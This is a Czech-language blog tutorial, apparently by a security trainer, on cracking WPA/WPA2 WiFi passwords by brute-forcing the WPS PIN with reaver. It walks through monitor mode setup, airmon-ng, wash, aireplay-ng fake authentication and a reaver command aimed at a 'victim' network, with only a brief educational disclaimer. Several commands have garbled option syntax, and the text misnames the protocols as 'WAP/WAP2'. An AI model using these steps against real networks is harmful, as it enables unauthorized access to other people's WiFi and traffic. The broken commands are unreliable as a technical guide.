Jak hacknout WPA/WPA2 WiFi pomocí Reaveru

Všichni víme, že většina lidí dává přednost zadání hesla k bezdrátovému připojení WiFi. To může být jednoduché jako 12345 nebo složité jako kombinace více písmen,číslic a znaků. No, tady je špatná zpráva, existuje nástroj s názvem reaver, který lze použít k prolomení hesla WAP/WAP2 WiFi.

O WEP, WAP a WAP2

Pro zlepšení funkcí WEP (Wired Equivalent Privacy) byl v roce 2003 vytvořen WiFi Protected Access neboli WPA. Toto dočasné vylepšení má stále poměrně slabé zabezpečení, ale snadněji se konfiguruje. Protokol WPA používá protokol TKIP (Temporal Key Integrity Protocol) pro bezpečnější šifrování, než nabízel protokol WEP.

O rok později, v roce 2004, byl k dispozici protokol WiFi Protected Access 2 (chráněný přístup k síti WiFi). WPA2 má silnější zabezpečení a je jednodušší na konfiguraci než předchozí možnosti. Hlavní rozdíl u WPA2 spočívá v tom, že místo TKIP používá Advanced Encryption Standard (AES).

Co potřebujete.

  • Adaptér WiFi, který podporuje režim monitoru
  • Počítač s WiFi
  • Blízkou síť WiFi zabezpečenou WPA
  • Nainstalovaný Reaver
  • Persistence

Předpokládám, že váš router je nakonfigurován tak, aby nepoužíval ověřování pomocí tlačítek.(PBC)

Provedeme toto

Nejprve, pokud používáte virtuální počítač, musíte povolit řadič USB tak, že přejdete do nastavení, pak kliknete na USB a vyberete zařízení USB.

NB: Ujistěte se, že bezdrátový adaptér, který používáte, podporuje režim monitoru.

Poté spusťte následující příkaz:

iwconfig

Tento příkaz zobrazuje pouze bezdrátová rozhraní

Spustit:

sudo ifconfig wlan0 down

Tento příkaz zakáže WiFi

Pak:

sudo airmon-ng check kill

Tento příkaz zabije všechny procesy, které by mohly zasahovat do používání mého rozhraní v režimu monitoru. Zabíjí správce sítě, takže není k dispozici internet.

Poté spusťte:

iwconfig wlan0 mode monitor

Tento příkaz změní režim ze spravovaného režimu na režim monitoru.

Řízený režim je výchozí režim pro všechna bezdrátová zařízení.

Důvod, proč potřebujeme změnit režim z řízeného na monitorovací, je ten, že chceme zachytávat nejen pakety, které mají adresu mac našeho zařízení, ale všechny pakety, i ty, které jsou odesílány do směrovače a dalších zařízení. To je možné pouze tehdy, když je adaptér WiFi v režimu monitor.

Poté spusťte:

sudo ifconfig wlan0 up

Tím se wifi opět zprovozní.

Poté spusťte:

iwconfig

Tímto zkontrolujete, zda se náš režim změnil z managed na monitor. Pokud ano, mělo by se to zobrazit v terminálu.

Následující obrázek ukazuje, že se režim změnil na monitor.

wash - interface wlan0

Zobrazí se všechny Aps s povoleným WPS pomocí bezdrátového rozhraní.

Aireplay-ng - fakeauth 30 -a<bssid> -h <macid> wlan0

Pro Mac ID otevřete novou kartu a zadejte ifconfig. Zkopírujte prvních 12 číslic z unspec do wlan0.

Ještě nestiskněte ENTER.

Otevřete další novou záložku.

Ujistěte se, že máte nainstalovaný reaver. Pokud ne, spusťte následující příkaz.

Sudo apt-get install aircrack-ng reaver

Tímto nainstalujete reaver.

Reaver hrubou silou zjistí pin a přiřadí ho k cíli, jakmile získá pin, použije ho k výpočtu skutečného klíče WAP/WAP2.

Poté spusťte následující příkaz:

Reaver - bssid<victim bssid> - channel <the channel of the victim> - interface wlan0 –vvv - no-associate

Na této kartě stiskněte enter a také na druhé kartě, o které jsem vám řekl, že nemáte stisknout enter.

To by mělo trvat několik minut, protože to zkouší všechny možné kombinace, a nakonec vám to dá PIN WPS, heslo WAP a název Wi-Fi

DISCLAIMER. Tento článek slouží k výukovým účelům, neneseme odpovědnost za případné škody způsobené při odkazování na něj.

Článek napsal Restercuter Nyawira, člen SheHacks KE, školitel a nadšenec do kybernetické bezpečnosti. Najdete ji na LinkedIn (Restercuter Nyawira) a Twitteru @Restercuter1.

Napsat komentář

Vaše e-mailová adresa nebude zveřejněna.